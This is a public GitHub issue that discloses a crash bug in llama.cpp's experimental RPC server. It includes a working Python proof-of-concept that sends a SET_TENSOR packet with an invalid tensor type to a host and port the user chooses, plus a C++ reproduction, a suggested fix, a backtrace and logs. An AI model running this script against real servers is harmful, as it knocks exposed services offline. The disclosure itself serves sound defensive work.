Misc. bug: RPC server crash on SET_TENSOR with invalid ggml_type #13067

Closed
@thevilledev

Description

Name and Version

$ llama-cli --version
register_backend: registered backend Metal (1 devices)
register_device: registered device Metal (Apple M1 Pro)
register_backend: registered backend BLAS (1 devices)
register_device: registered device BLAS (Accelerate)
register_backend: registered backend RPC (0 devices)
register_backend: registered backend CPU (1 devices)
register_device: registered device CPU (Apple M1 Pro)
version: 5169 (6cf3a31e)
built with Apple clang version 17.0.0 (clang-1700.0.13.3) for arm64-apple-darwin24.4.0

Operating systems

Mac

Which llama.cpp modules do you know to be affected?

Other (Please specify in the next section)

Command line

./build/bin/rpc-server -p 50052

Problem description & steps to reproduce

Description

NOTE: This was originally reported as a security advisory. After discussion with the maintainers, it has now been disclosed as a public issue, since the RPC server is still an experimental feature (see the RPC example).

The rpc-server crashes when processing an RPC_CMD_SET_TENSOR command if the provided data contains an invalid ggml_type value within the rpc_tensor structure. The server doesn't validate the type field read from the network before using it internally. This leads to a failed assertion (GGML_ASSERT(type >= 0 && type < GGML_TYPE_COUNT)) during tensor deserialization (likely in ggml_new_tensor_4d), causing the server process to abort().
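
For reference, the failing assertion can be reached directly through ggml, without the RPC layer in between. The short C++ program below is a local reproduction sketch rather than part of the report; it assumes only that ggml.h is available and mirrors what the server effectively does when it casts the unvalidated network value to ggml_type:

#include "ggml.h"

int main() {
    // no_alloc = true: only tensor metadata is needed, no data buffer
    ggml_init_params params = { /*mem_size*/ 16 * 1024 * 1024, /*mem_buffer*/ nullptr, /*no_alloc*/ true };
    ggml_context * ctx = ggml_init(params);

    // 65 ('A') is outside [0, GGML_TYPE_COUNT), so this call aborts with
    // GGML_ASSERT(type >= 0 && type < GGML_TYPE_COUNT), the same failure the
    // rpc-server hits via deserialize_tensor -> ggml_new_tensor_4d.
    ggml_new_tensor_4d(ctx, (ggml_type) 65, 1, 1, 1, 1);

    ggml_free(ctx);
    return 0;
}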

Expected Behavior

The server should validate the ggml_type read from the SET_TENSOR data before passing it to GGML functions (a sketch of such a check follows the list below). If the type is invalid, the server should:

  • Log an error message indicating invalid input.
  • Reject the command (e.g., send an error response or simply close the connection).
  • Continue running without crashing.
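
A minimal sketch of that validation, assuming a deserialization helper in the spirit of rpc_server::deserialize_tensor from the backtrace below; the function name, signature, and error-handling convention are assumptions for illustration, not the actual ggml-rpc.cpp code:

#include <cstdint>
#include <cstdio>
#include "ggml.h"

// Returns true only if the raw value received from the network maps to a
// defined ggml_type. Using uint32_t rules out negative values by construction.
static bool rpc_type_is_valid(uint32_t type) {
    return type < (uint32_t) GGML_TYPE_COUNT;
}

// Hypothetical checked deserialization step: reject malformed input instead of
// letting ggml_new_tensor_4d() abort on GGML_ASSERT(type >= 0 && type < GGML_TYPE_COUNT).
static ggml_tensor * deserialize_tensor_checked(ggml_context * ctx, uint32_t type, const int64_t ne[4]) {
    if (!rpc_type_is_valid(type)) {
        fprintf(stderr, "rpc-server: rejecting SET_TENSOR with invalid ggml_type %u\n", (unsigned) type);
        return nullptr; // caller sends an error response or simply closes the connection
    }
    return ggml_new_tensor_4d(ctx, (ggml_type) type, ne[0], ne[1], ne[2], ne[3]);
}

Wherever the check is ultimately placed, the important property is that the range check happens before any value from the wire reaches a ggml constructor.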

Actual Behavior

The server reads the invalid ggml_type (e.g., 65 if the payload starts with 'A' bytes) and uses it internally. A GGML_ASSERT checking the type validity fails, causing the server process to terminate via abort(). The client typically sees the connection break unexpectedly.

Steps to Reproduce

  1. Clone the repository: git clone git@github.com:ggml-org/llama.cpp.git && cd llama.cpp
  2. Build the rpc-server binary: cmake -B build . -DGGML_RPC=ON && cd build && cmake --build . --config Release --target rpc-server
  3. Run the server from the build directory: ./bin/rpc-server -p 50052
  4. Run the Python Proof of Concept script below (save as poc_rpc_crash.py): python poc_rpc_crash.py
import socket
import struct
import sys
import time

# Server details (change if needed)
DEFAULT_HOST = "127.0.0.1"
DEFAULT_PORT = 50052

# GGML RPC Commands (enum rpc_cmd)
RPC_CMD_SET_TENSOR = 6
RPC_CMD_HELLO = 14

# Size definitions
PAYLOAD_DATA_SIZE = 1 * 1024 # 1 KB of 'A's
INTERNAL_SIZE_FIELD_VAL = PAYLOAD_DATA_SIZE # Value for the internal size field
CHUNK_SIZE = 1024 # Send data in 1KB chunks

# --- Helper Functions ---

def p8(value):
    """Packs an integer into a 1-byte byte string (unsigned char)."""
    return struct.pack('<B', value)

def p64(value):
    """Packs an integer into an 8-byte byte string (unsigned long long)."""
    return struct.pack('<Q', value)

def u64(value_bytes):
    """Unpacks an 8-byte byte string into an integer (unsigned long long)."""
    return struct.unpack('<Q', value_bytes)[0]

def recv_exact(sock, num_bytes):
    """Receives exactly num_bytes from the socket."""
    data = b''
    start_time = time.time()
    # Use socket timeout if set
    timeout = sock.gettimeout()

    while len(data) < num_bytes:
        try:
            # Check for timeout if applicable
            if timeout and (time.time() - start_time > timeout):
                print(f"[-] Socket timeout after {timeout}s waiting for {num_bytes} bytes (got {len(data)})", file=sys.stderr)
                return None
            # Calculate remaining bytes, request at most CHUNK_SIZE
            remaining = num_bytes - len(data)
            chunk = sock.recv(min(remaining, CHUNK_SIZE))
            if not chunk:
                # Connection closed prematurely
                print(f"[-] Connection closed by peer while trying to receive {num_bytes} bytes (got {len(data)})", file=sys.stderr)
                return None
            data += chunk
        except socket.timeout:
            print(f"[-] Socket timeout explicitly caught waiting for {num_bytes} bytes (got {len(data)})", file=sys.stderr)
            return None
        except OSError as e:
            print(f"[-] Socket error during recv_exact: {e}", file=sys.stderr)
            return None
    return data

def send_all(sock, data):
    """Sends all data reliably."""
    try:
        sock.sendall(data)
        return True
    except OSError as e:
        print(f"[-] Socket error during send_all: {e}", file=sys.stderr)
        return False

def send_data_chunks_native(sock, size):
    """Sends 'size' bytes of 'A' in chunks using standard sockets."""
    bytes_sent = 0
    num_chunks = (size + CHUNK_SIZE - 1) // CHUNK_SIZE
    for i in range(num_chunks):
        current_chunk_size = min(CHUNK_SIZE, size - bytes_sent)
        chunk = b'A' * current_chunk_size
        if not send_all(sock, chunk):
            print(f"[-] Failed to send chunk {i+1}", file=sys.stderr)
            return False
        bytes_sent += current_chunk_size
    return True

# --- Main Logic ---

def run_exploit_native(host, port):
    print(f"[*] Connecting to {host}:{port}...")
    sock = None
    try:
        # Set a connection timeout
        sock = socket.create_connection((host, port), timeout=10)
        print("[+] Connected.")
        # Set a timeout for subsequent socket operations
        sock.settimeout(15)

        print("[*] Performing HELLO handshake...")
        hello_cmd = p8(RPC_CMD_HELLO)
        hello_input_size = p64(0)
        hello_packet = hello_cmd + hello_input_size
        if not send_all(sock, hello_packet): raise ConnectionError("Failed to send HELLO packet")

        hello_resp_size_bytes = recv_exact(sock, 8)
        if not hello_resp_size_bytes: raise ConnectionError("Server closed during HELLO response size read")
        hello_resp_size = u64(hello_resp_size_bytes)

        # Expecting 3 bytes: major, minor, patch version
        if hello_resp_size < 3:
            # Allow for potential future expansion, but need at least 3 for version
            print(f"[!] Warning: Unexpected HELLO response size: {hello_resp_size}. Expected >= 3.")
            # Attempt to read anyway if size > 0
            if hello_resp_size == 0:
                 raise ValueError("HELLO response size is zero.")

        hello_resp_data = recv_exact(sock, hello_resp_size)
        if not hello_resp_data or len(hello_resp_data) < 3:
            raise ConnectionError("Incomplete HELLO response data received")
        print(f"[+] HELLO ok (v{hello_resp_data[0]}.{hello_resp_data[1]}.{hello_resp_data[2]}) Received {len(hello_resp_data)} bytes total.")

        print("[*] Attempting crash via SET_TENSOR with invalid type in 1KB payload...")
        cmd = p8(RPC_CMD_SET_TENSOR)

        # This is the size field read by recv_msg to determine buffer size
        internal_size_field = p64(INTERNAL_SIZE_FIELD_VAL)

        # This is the 'total payload size' field sent after the command byte.
        # It should reflect the size of data *following* this field.
        # In this case, it's the internal_size_field (8 bytes) + the actual garbage data (PAYLOAD_DATA_SIZE bytes)
        actual_payload_size_val = 8 + PAYLOAD_DATA_SIZE
        actual_payload_size_field = p64(actual_payload_size_val)

        # Header: command_byte (1) + actual_payload_size (8) + internal_size_field (8)
        fixed_header = cmd + actual_payload_size_field + internal_size_field
        print(f"[*] Sending header (Cmd: {RPC_CMD_SET_TENSOR}, TotalPayloadSize: {actual_payload_size_val}, InternalResizeField: {u64(internal_size_field):#x}) -> {len(fixed_header)} bytes")

        if not send_all(sock, fixed_header):
            raise ConnectionError("Failed to send fixed header")

        # Send the 1KB garbage data ('A' * 1024)
        print(f"[*] Sending {PAYLOAD_DATA_SIZE} bytes of garbage data ('A' * {PAYLOAD_DATA_SIZE})...")
        if not send_data_chunks_native(sock, PAYLOAD_DATA_SIZE):
             raise ConnectionError("Failed during data chunk send")
        print(f"[+] Header and {PAYLOAD_DATA_SIZE} bytes of data sent.")

        # Expect the server to crash after receiving data and trying to process it
        print("[*] Waiting for server disconnect (expecting crash after processing header)...")
        # Try receiving a small amount of data. An empty read means disconnected (crashed).
        # Using a longer timeout here as processing might take a moment before crash
        sock.settimeout(10)
        recv_data = None
        try:
            recv_data = sock.recv(1024)
        except socket.timeout:
            # This could happen if the server hangs instead of crashing, less likely for this specific bug
            print("[-] Timeout waiting for server disconnect. Server might be hung?")
            # Still consider it potentially successful if timeout occurs after sending bad data
            print("[?] Vulnerability might still be triggered if server is unresponsive.")
            return # Exit gracefully
        except OSError as e:
             # Connection reset/broken pipe often indicates server crash
            print(f"[+] Socket error likely indicating server crash: {e}. Vulnerability Confirmed.")
            return # Exit gracefully

        if recv_data:
            print(f"[-] Received unexpected data ({len(recv_data)} bytes): {recv_data[:64]}... Server might not have crashed.")
        else:
            # recv() returning 0 bytes means the other side closed the connection cleanly.
            print("[+] Connection closed by server (received 0 bytes - likely crashed due to assertion failure). Vulnerability Confirmed.")

    except ConnectionRefusedError:
        print(f"[-] Connection refused by {host}:{port}. Is the server running?", file=sys.stderr)
    except socket.timeout:
         print("[-] Timeout during connection or initial handshake. Check server state.", file=sys.stderr)
    except (ConnectionError, ValueError, OSError, struct.error) as e:
        print(f"[-] An error occurred: {e}", file=sys.stderr)
    except Exception as e:
        print(f"[-] An unexpected error occurred: {e}", file=sys.stderr)
        import traceback
        traceback.print_exc()
    finally:
        if sock:
            sock.close()
            print("[*] Connection closed.")

if __name__ == "__main__":
    target_host = DEFAULT_HOST
    target_port = DEFAULT_PORT
    if len(sys.argv) > 1:
        target_host = sys.argv[1]
    if len(sys.argv) > 2:
        try:
            target_port = int(sys.argv[2])
        except ValueError:
            print(f"[-] Invalid port: {sys.argv[2]}", file=sys.stderr)
            sys.exit(1)

    run_exploit_native(target_host, target_port)

Debugger backtrace to confirm crash:

* thread #1, queue = 'com.apple.main-thread', stop reason = signal SIGABRT
  * frame #0: 0x0000000199164388 libsystem_kernel.dylib`__pthread_kill + 8
    frame #1: 0x000000019919d88c libsystem_pthread.dylib`pthread_kill + 296
    frame #2: 0x00000001990a6c60 libsystem_c.dylib`abort + 124
    frame #3: 0x000000010032d31c libggml-base.dylib`ggml_abort + 116
    frame #4: 0x000000010032eb54 libggml-base.dylib`ggml_new_tensor_impl + 824
    frame #5: 0x000000010032ed08 libggml-base.dylib`ggml_new_tensor_4d + 56
    frame #6: 0x000000010005ed18 libggml-rpc.dylib`rpc_server::deserialize_tensor(ggml_context*, rpc_tensor const*) + 56
    frame #7: 0x000000010005f208 libggml-rpc.dylib`rpc_server::set_tensor(std::__1::vector<unsigned char, std::__1::allocator<unsigned char>> const&) + 136
    frame #8: 0x00000001000610ac libggml-rpc.dylib`ggml_backend_rpc_start_server + 2008
    frame #9: 0x0000000100003214 rpc-server`main + 3012
    frame #10: 0x0000000198dfeb4c dyld`start + 6000

First Bad Commit

5e31828

Relevant log output

Starting RPC server v1.0.0
  endpoint       : 127.0.0.1:50052
  local cache    : n/a
  backend memory : 16384 MB
Accepted client connection, free_mem=17179869184, total_mem=17179869184
/Users/ville/git/llama.cpp/ggml/src/ggml.c:1568: GGML_ASSERT(type >= 0 && type < GGML_TYPE_COUNT) failed
[1]    61001 abort      ./bin/rpc-server
